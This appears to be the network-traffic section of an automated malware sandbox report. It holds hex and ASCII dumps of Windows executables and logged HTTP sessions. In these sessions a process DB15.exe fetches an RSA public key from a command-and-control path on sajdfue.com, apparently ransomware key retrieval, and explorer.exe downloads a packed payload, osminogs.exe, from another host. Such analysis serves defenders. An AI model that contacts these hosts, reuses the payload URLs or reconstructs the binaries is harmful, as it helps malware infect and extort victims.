                                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 18 42 e4 08 5c 23 8a 5b 5c 23 8a 5b 5c 23 8a 5b 33 55 14 5b 44 23 8a 5b 33 55 20 5b 28 23 8a 5b 33 55 21 5b 7b 23 8a 5b 55 5b 19 5b 57 23 8a 5b 5c 23 8b 5b 37 23 8a 5b 33 55 25 5b 5d 23 8a 5b 33 55 10 5b 5d 23 8a 5b 33 55 17 5b 5d 23 8a 5b 52 69 63 68 5c 23 8a 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c9 f0 b2 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 f4 00 00 00 92 13 00 00 00 00 00 b1 1e 00 00 00 10 00 00 00 10 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 14 00 00 04 00 00 27 7f 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 5c 03 00 78 00 00 00 00 c0 13 00 b6 d9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 53 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a8 f2 00 00 00 10 00 00 00 f4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 de 55 02 00 00 10 01 00 00 56 02 00 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 42 10 00 00 70 03 00 00 2c 00 00 00 4e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b6 d9 00 00 00 c0 13 00 00 da 00 00 00 7a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$B\#[\#[\#[3U[D#[3U [(#[3U![{#[U[[W#[\#[7#[3U%[]#[3U[]#[3U[]#[Rich\#[PELc@'\xS@.text `.rdataUV@@.dataBp,N@.rsrcz@@
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:08.362699032 CET1286INData Raw: c7 01 30 12 41 00 e9 49 07 00 00 cc cc cc cc cc 56 8b f1 c7 06 30 12 41 00 e8 36 07 00 00 f6 44 24 08 01 74 09 56 e8 14 0c 00 00 83 c4 04 8b c6 5e c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc 83 7e 14 08 72 0b 8b 06 50 e8 f1 0b 00 00 83 c4 04 33
                                                                                                                                                                                                                                      Data Ascii: 0AIV0A6D$tV^~rP3FFfSUl$Vs;shTQC+;s;u.]3T^][tM9Cr9Gr6SiQP8pwr
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:08.362709999 CET308INData Raw: f0 11 41 00 e8 ac 09 00 00 cc 8b ff 55 8b ec 56 ff 75 08 8b f1 e8 66 02 00 00 c7 06 f0 11 41 00 8b c6 5e 5d c2 04 00 8b ff 55 8b ec 83 ec 0c 8b 45 08 89 45 08 8d 45 08 50 8d 4d f4 e8 b1 01 00 00 68 e8 56 43 00 8d 45 f4 50 c7 45 f4 fc 11 41 00 e8
                                                                                                                                                                                                                                      Data Ascii: AUVufA^]UEEEPMhVCEPEA_UVuA^]UVEtVY^]UVEtVY^]UVEtVjY^];|pCuU SW3j
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:08.601636887 CET1286INData Raw: 45 e4 ff ff ff 7f c7 45 ec 42 00 00 00 e8 53 0c 00 00 83 c4 10 ff 4d e4 8b f0 78 07 8b 45 e0 88 18 eb 0c 8d 45 e0 50 53 e8 a6 09 00 00 59 59 8b c6 5e 5f 5b c9 c3 8b ff 55 8b ec 8b c1 8b 4d 08 c7 00 08 12 41 00 8b 09 89 48 04 c6 40 08 00 5d c2 08
                                                                                                                                                                                                                                      Data Ascii: EEBSMxEEPSYY^_[UMAH@]AuAU}Wt-VupVWYYGtuVPG^_]V~tvnYfF^UEVfAF0^]UVuW;
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:08.601665020 CET1286INData Raw: 59 59 85 db 74 04 8b c3 eb 03 33 c0 40 50 6a 00 ff 35 88 9b 43 00 ff 15 ac 10 41 00 8b f8 85 ff 75 26 6a 0c 5e 39 05 90 9b 43 00 74 0d 53 e8 5b 1c 00 00 59 85 c0 75 a9 eb 07 e8 a8 14 00 00 89 30 e8 a1 14 00 00 89 30 8b c7 5f 5e eb 14 53 e8 3a 1c
                                                                                                                                                                                                                                      Data Ascii: YYt3@Pj5CAu&j^9CtS[Yu00_^S:Y3[]jh(WC339u;uc8PV.YYuuuuPUEEEPj]YYUEPjuhV<
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:08.601720095 CET1286INData Raw: 00 00 c7 00 22 00 00 00 eb e3 53 33 db a8 01 74 16 89 5e 04 a8 10 0f 84 87 00 00 00 8b 4e 08 83 e0 fe 89 0e 89 46 0c 8b 46 0c 83 e0 ef 83 c8 02 89 46 0c 89 5e 04 89 5d fc a9 0c 01 00 00 75 2c e8 6b 17 00 00 83 c0 20 3b f0 74 0c e8 5f 17 00 00 83
                                                                                                                                                                                                                                      Data Ascii: "S3t^NFFF^]u,k ;t_@;uuDYuVDYFWF>HN+IN;~WPuCEM FyMttStC@ tjSSQT;#t%F
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:08.601774931 CET1286INData Raw: 6c 74 18 80 fa 77 0f 85 81 08 00 00 81 8d f0 fd ff ff 00 08 00 00 e9 72 08 00 00 80 3f 6c 75 16 47 81 8d f0 fd ff ff 00 10 00 00 89 bd c4 fd ff ff e9 57 08 00 00 83 8d f0 fd ff ff 10 e9 4b 08 00 00 83 8d f0 fd ff ff 20 e9 3f 08 00 00 8a 07 3c 36
                                                                                                                                                                                                                                      Data Ascii: ltwr?luGWK ?<6u4u<3u2u<d<i<o<u<x<XPPLYYt"
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:08.601881027 CET1286INData Raw: e8 fd ff ff 08 00 00 00 89 8d b8 fd ff ff eb 24 83 e8 73 0f 84 bd fc ff ff 48 48 0f 84 90 fe ff ff 83 e8 03 0f 85 b7 01 00 00 c7 85 b8 fd ff ff 27 00 00 00 f6 85 f0 fd ff ff 80 c7 85 e0 fd ff ff 10 00 00 00 0f 84 70 fe ff ff 8a 85 b8 fd ff ff 04
                                                                                                                                                                                                                                      Data Ascii: $sHH'pQ0LR t@tCCC@t3@t|su3}
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:08.601916075 CET1286INData Raw: ff ff 50 ff 15 c4 10 41 00 85 c0 75 10 85 ff 75 0c 83 fb ff 74 07 53 e8 7f 2c 00 00 59 8b 4d fc 5f 33 cd 5b e8 5c e6 ff ff c9 c3 8b ff 56 6a 01 be 17 04 00 c0 56 6a 02 e8 c5 fe ff ff 83 c4 0c 56 ff 15 c0 10 41 00 50 ff 15 bc 10 41 00 5e c3 8b ff
                                                                                                                                                                                                                                      Data Ascii: PAuutS,YM_3[\VjVjVAPA^U5$CAt]uuuuu3PPPPPUE3;pCtA-rHwjX]pC]DjY;#]'uqC'uqC
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:08.782346010 CET924INData Raw: 82 22 00 00 39 07 74 ed 3b fb 72 3e ff 37 ff d6 8b d8 e8 6f 22 00 00 89 07 ff d3 ff 35 cc a2 53 00 ff d6 8b d8 ff 35 c8 a2 53 00 ff d6 39 5d dc 75 05 39 45 d8 74 0e 89 5d dc 89 5d d0 89 45 d8 8b f8 89 7d d4 8b 5d d0 eb ab c7 45 e4 c0 11 41 00 81
                                                                                                                                                                                                                                      Data Ascii: "9t;r>7o"5S5S9]u9Et]]E}]EA}AsEtEEA}AsEtEE }u)XCj?Yu}tj?YUjju]Ujju
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:08.841461897 CET1286INData Raw: 00 c3 a1 c0 a2 53 00 56 6a 14 5e 85 c0 75 07 b8 00 02 00 00 eb 06 3b c6 7d 07 8b c6 a3 c0 a2 53 00 6a 04 50 e8 62 38 00 00 59 59 a3 a0 92 53 00 85 c0 75 1e 6a 04 56 89 35 c0 a2 53 00 e8 49 38 00 00 59 59 a3 a0 92 53 00 85 c0 75 05 6a 1a 58 5e c3
                                                                                                                                                                                                                                      Data Ascii: SVj^u;}SjPb8YYSujV5SI8YYSujX^3rCS tC|j^3rCWSt;tu1 BprC|_3^F=PCtD5SYUVurC;r"`tCw+


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      4192.168.2.64971678.89.158.42804436C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:11.867976904 CET139OUTGET /test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                                                                                      Host: sajdfue.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:12.395102024 CET762INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:24 GMT
                                                                                                                                                                                                                                      Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                                                                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                                                                                      Content-Length: 558
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 7a 7a 56 59 62 38 43 45 72 62 57 5c 2f 70 46 6b 68 4c 44 79 62 5c 5c 6e 39 49 4d 6e 4d 6a 5a 36 4c 58 7a 46 5a 38 56 45 4b 34 46 56 77 72 4b 4b 33 37 66 6d 65 71 69 6c 71 6f 34 33 66 6d 4c 50 49 47 2b 7a 67 36 41 54 70 5c 2f 31 2b 52 43 6a 57 79 42 6c 63 6d 67 52 66 5c 5c 6e 51 56 62 78 51 64 35 6b 67 6b 4a 4d 5c 2f 71 76 44 75 6f 5a 69 53 55 36 62 45 74 4f 32 47 75 6c 36 32 59 33 72 56 57 32 52 79 34 66 38 79 57 54 43 38 30 45 31 35 55 74 78 44 35 78 31 52 55 31 30 5c 5c 6e 4f 68 6a 56 4d 75 32 2b 6e 7a 76 46 34 42 42 69 54 47 4e 34 77 4f 52 2b 4b 45 62 6d 58 4a 4d 78 38 47 62 79 58 38 72 4b 70 53 56 4d 34 41 74 68 4f 44 68 66 31 4f 37 78 4f 38 4c 44 45 33 41 32 5c 5c 6e 4c 56 62 2b 66 67 58 74 6c 70 2b 4b 55 37 49 6e 4b 5c 2f 79 6b 71 67 59 47 51 4a 37 6f 74 31 54 32 78 68 62 75 69 49 32 43 79 70 59 45 6a 55 57 6a 36 72 79 49 4d 42 74 59 54 52 32 37 6b 6e 31 47 5c 5c 6e 6e 73 6c 62 31 4a 4c 37 4e 69 58 6f 43 53 45 68 62 59 78 55 71 55 76 30 68 56 75 47 31 65 5a 37 57 71 71 47 75 6d 66 37 43 4b 6a 4d 4a 58 5a 6e 4c 6f 79 4e 42 66 57 6f 6c 69 32 71 78 75 52 58 5c 5c 6e 66 77 49 44 41 51 41 42 5c 5c 6e 2d 2d 2d 2d 2d 45 4e 44 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 22 2c 22 69 64 22 3a 22 72 36 79 78 6c 31 47 54 38 69 47 32 58 36 4a 61 4a 31 59 4e 6e 59 7a 31 39 58 6a 77 4d 5a 6e 6b 43 45 7a 56 30 34 6c 35 22 7d
                                                                                                                                                                                                                                      Data Ascii: {"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzzVYb8CErbW\/pFkhLDyb\\n9IMnMjZ6LXzFZ8VEK4FVwrKK37fmeqilqo43fmLPIG+zg6ATp\/1+RCjWyBlcmgRf\\nQVbxQd5kgkJM\/qvDuoZiSU6bEtO2Gul62Y3rVW2Ry4f8yWTC80E15UtxD5x1RU10\\nOhjVMu2+nzvF4BBiTGN4wOR+KEbmXJMx8GbyX8rKpSVM4AthODhf1O7xO8LDE3A2\\nLVb+fgXtlp+KU7InK\/ykqgYGQJ7ot1T2xhbuiI2CypYEjUWj6ryIMBtYTR27kn1G\\nnslb1JL7NiXoCSEhbYxUqUv0hVuG1eZ7WqqGumf7CKjMJXZnLoyNBfWoli2qxuRX\\nfwIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5"}


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      5192.168.2.64971778.89.158.42806320C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:11.871248960 CET128OUTGET /test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4 HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                                                                                      Host: sajdfue.com
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:12.423135996 CET762INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:24 GMT
                                                                                                                                                                                                                                      Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                                                                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                                                                                      Content-Length: 558
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 7a 7a 56 59 62 38 43 45 72 62 57 5c 2f 70 46 6b 68 4c 44 79 62 5c 5c 6e 39 49 4d 6e 4d 6a 5a 36 4c 58 7a 46 5a 38 56 45 4b 34 46 56 77 72 4b 4b 33 37 66 6d 65 71 69 6c 71 6f 34 33 66 6d 4c 50 49 47 2b 7a 67 36 41 54 70 5c 2f 31 2b 52 43 6a 57 79 42 6c 63 6d 67 52 66 5c 5c 6e 51 56 62 78 51 64 35 6b 67 6b 4a 4d 5c 2f 71 76 44 75 6f 5a 69 53 55 36 62 45 74 4f 32 47 75 6c 36 32 59 33 72 56 57 32 52 79 34 66 38 79 57 54 43 38 30 45 31 35 55 74 78 44 35 78 31 52 55 31 30 5c 5c 6e 4f 68 6a 56 4d 75 32 2b 6e 7a 76 46 34 42 42 69 54 47 4e 34 77 4f 52 2b 4b 45 62 6d 58 4a 4d 78 38 47 62 79 58 38 72 4b 70 53 56 4d 34 41 74 68 4f 44 68 66 31 4f 37 78 4f 38 4c 44 45 33 41 32 5c 5c 6e 4c 56 62 2b 66 67 58 74 6c 70 2b 4b 55 37 49 6e 4b 5c 2f 79 6b 71 67 59 47 51 4a 37 6f 74 31 54 32 78 68 62 75 69 49 32 43 79 70 59 45 6a 55 57 6a 36 72 79 49 4d 42 74 59 54 52 32 37 6b 6e 31 47 5c 5c 6e 6e 73 6c 62 31 4a 4c 37 4e 69 58 6f 43 53 45 68 62 59 78 55 71 55 76 30 68 56 75 47 31 65 5a 37 57 71 71 47 75 6d 66 37 43 4b 6a 4d 4a 58 5a 6e 4c 6f 79 4e 42 66 57 6f 6c 69 32 71 78 75 52 58 5c 5c 6e 66 77 49 44 41 51 41 42 5c 5c 6e 2d 2d 2d 2d 2d 45 4e 44 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 22 2c 22 69 64 22 3a 22 72 36 79 78 6c 31 47 54 38 69 47 32 58 36 4a 61 4a 31 59 4e 6e 59 7a 31 39 58 6a 77 4d 5a 6e 6b 43 45 7a 56 30 34 6c 35 22 7d
                                                                                                                                                                                                                                      Data Ascii: {"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzzVYb8CErbW\/pFkhLDyb\\n9IMnMjZ6LXzFZ8VEK4FVwrKK37fmeqilqo43fmLPIG+zg6ATp\/1+RCjWyBlcmgRf\\nQVbxQd5kgkJM\/qvDuoZiSU6bEtO2Gul62Y3rVW2Ry4f8yWTC80E15UtxD5x1RU10\\nOhjVMu2+nzvF4BBiTGN4wOR+KEbmXJMx8GbyX8rKpSVM4AthODhf1O7xO8LDE3A2\\nLVb+fgXtlp+KU7InK\/ykqgYGQJ7ot1T2xhbuiI2CypYEjUWj6ryIMBtYTR27kn1G\\nnslb1JL7NiXoCSEhbYxUqUv0hVuG1eZ7WqqGumf7CKjMJXZnLoyNBfWoli2qxuRX\\nfwIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5"}


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      6192.168.2.649718103.23.232.80804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.551417112 CET165OUTGET /osminogs.exe HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: m2reg.ulm.ac.id
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.885752916 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:15 GMT
                                                                                                                                                                                                                                      Server: Apache
                                                                                                                                                                                                                                      Last-Modified: Thu, 07 Mar 2024 16:56:25 GMT
                                                                                                                                                                                                                                      ETag: "682058-61314f4b1ca93"
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      Content-Length: 6824024
                                                                                                                                                                                                                                      Cache-Control: max-age=31536000, public
                                                                                                                                                                                                                                      Expires: Fri, 28 Mar 2025 16:51:15 GMT
                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                      Pragma: public
                                                                                                                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-msdownload
                                                                                                                                                                                                                                      Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 0a 00 69 3a e2 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 50 03 00 00 a4 13 00 00 00 00 00 7f e5 97 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 ce 00 00 04 00 00 ba bb 68 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 c7 98 00 f0 00 00 00 00 40 ca 00 28 07 04 00 00 00 00 00 00 00 00 00 00 06 68 00 58 1a 00 00 00 20 ca 00 24 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 66 00 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 2b 4f 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c3 29 00 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 9b 00 00 00 90 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 cb 86 c2 a4 29 59 34 00 00 30 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 76 6d 70 cb 86 c2 a4 a0 12 1e 00 00 90 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 76 6d 70 c2 a2 7b c2 4b 70 0f 00 00 b0 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 76 6d 70 c2 a2 7b c2 24 02 00 00 00 30 66 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 76 6d 70 c2 a2 7b c2 d0 d9 63 00 00 40 66 00 00 da 63 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 24 1a 00 00 00 20 ca 00 00 1c 00 00 00 e2 63 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 28 07 04 00 00 40 ca 00 00 08 04 00 00 fe 63 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELi:eP@Ph@@(hX $0f.text+O `.rdata)`@@.data8@.vmp)Y40``.vmp8``.vmp{KpV `.vmp{$0f@.vmp{c@fc `.reloc$ c@@.rsrc(@c@@
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.885772943 CET1286INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii: Vng@l
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.885786057 CET1286INData Raw: 13 c8 53 79 f4 68 c3 d3 73 c2 9d 0b ce ac 9b 67 59 ce 46 bb af 5e 30 b9 e5 1c bc 49 5d f8 96 07 5b be 1e ab 10 83 82 c1 d2 a5 64 ef 7c 53 92 09 9a f5 34 6b 78 e3 df 6e 00 b1 f2 fd 4c ec 5d c4 f2 74 1f ec 20 f0 b9 f3 98 5a b1 1f 04 69 c6 20 ee 67
                                                                                                                                                                                                                                      Data Ascii: SyhsgYF^0I][d|S4kxnL]t Zi g*hSyO+!0nduncE`;`RyXW3C`<=QWu8 Sy=DpF4/cSyIT[u.>=@bsaQl+cn$1n76tc
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.885799885 CET1286INData Raw: b5 b9 1d 90 f7 71 4c 6c a7 5a 63 2c 31 52 6d e8 c7 e6 3d e1 aa 61 3f a9 85 6c e5 72 bc ed 60 f0 e9 b7 6f 98 bc ab c0 bc 1b 18 97 c5 0e 0b 8d 69 ac 40 68 6e 52 be 33 54 9b 7e f2 2e e2 3b fa 02 bc 8d 50 5a 9e a0 9c 16 4c b5 43 2a 17 d1 cd 9a 98 03
                                                                                                                                                                                                                                      Data Ascii: qLlZc,1Rm=a?lr`oi@hnR3T~.;PZLC*C(*xMT_`X1%DY:(dqI2**MMz~**Ara&C4';S75BB(+FHu^K(#Vju/}-`AI
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.885821104 CET1286INData Raw: 14 57 dc 00 8d 5b a7 00 1c e0 d9 00 56 44 a6 00 00 07 05 01 90 91 d9 00 2b e4 04 01 97 2b ad 00 3b f0 a9 00 70 6b a8 00 26 6c ad 00 85 9a a7 00 de 7d ad 00 a5 df d9 00 d9 5d c8 00 72 52 aa 00 95 99 dc 00 30 18 da 00 8c 97 04 01 6b 30 07 01 dc e6
                                                                                                                                                                                                                                      Data Ascii: W[VD++;pk&l}]rR0k0N5`Z/vTkr$.]pQLq<+4rhsq=F5u\R,
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.885874987 CET1286INData Raw: ba d5 86 d9 58 db 48 27 e6 a9 ba c9 08 7b 28 af ae 29 3f fd 86 6b 4d af 2a 75 ca 6b 05 e0 bc 29 89 24 30 c9 a7 2e 72 eb 4b e2 4f 0f 87 e1 82 61 00 68 37 85 04 a3 89 47 00 e9 af d8 30 00 c1 6c 24 08 ce d3 ea e9 ab 9f 32 00 8d 64 24 1c e9 6e 1f 62
                                                                                                                                                                                                                                      Data Ascii: XH'{()?kM*uk)$0.rKOah7G0l$2d$nb68gj<_EBCNSU7(Bq_M^w1o>ht$O1&(afffffI)DL'16fD$
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:15.885890007 CET1286INData Raw: ac 1b ad 3b 8d 64 24 1c e9 9b 6e 03 00 8b 8c 31 f4 9f 57 9c ba 9f 9c b9 f3 66 f7 d2 53 0f bf da 0f a3 d2 0f a2 e8 d5 3b 31 00 0f 82 b6 eb 60 00 8d 64 24 14 e9 82 1a 62 00 0f 34 e8 86 54 5e 00 66 0f b6 8c 0f 7e a2 d9 9b ba 39 83 1f cc c7 44 24 00
                                                                                                                                                                                                                                      Data Ascii: ;d$n1WfS;1`d$b4T^f~9D$864PRT'f\$K]?f4r0fHTL2'oP?3&%~uU [LEKc#:F33$
